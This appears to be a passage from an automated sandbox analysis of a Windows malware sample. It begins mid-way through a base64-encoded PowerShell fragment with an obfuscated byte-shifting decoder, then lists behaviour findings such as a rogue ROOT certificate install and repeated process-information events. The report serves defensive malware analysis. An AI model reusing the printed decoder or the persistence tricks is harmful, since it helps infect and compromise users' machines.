gICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D73A05 push FFFFFFE9h; iretd 5_2_07D73A07
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0553C9C0 push es; ret 6_2_0553C9D0

                          Persistence and Installation Behavior

                          barindex
                          Installs new ROOT certificates
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
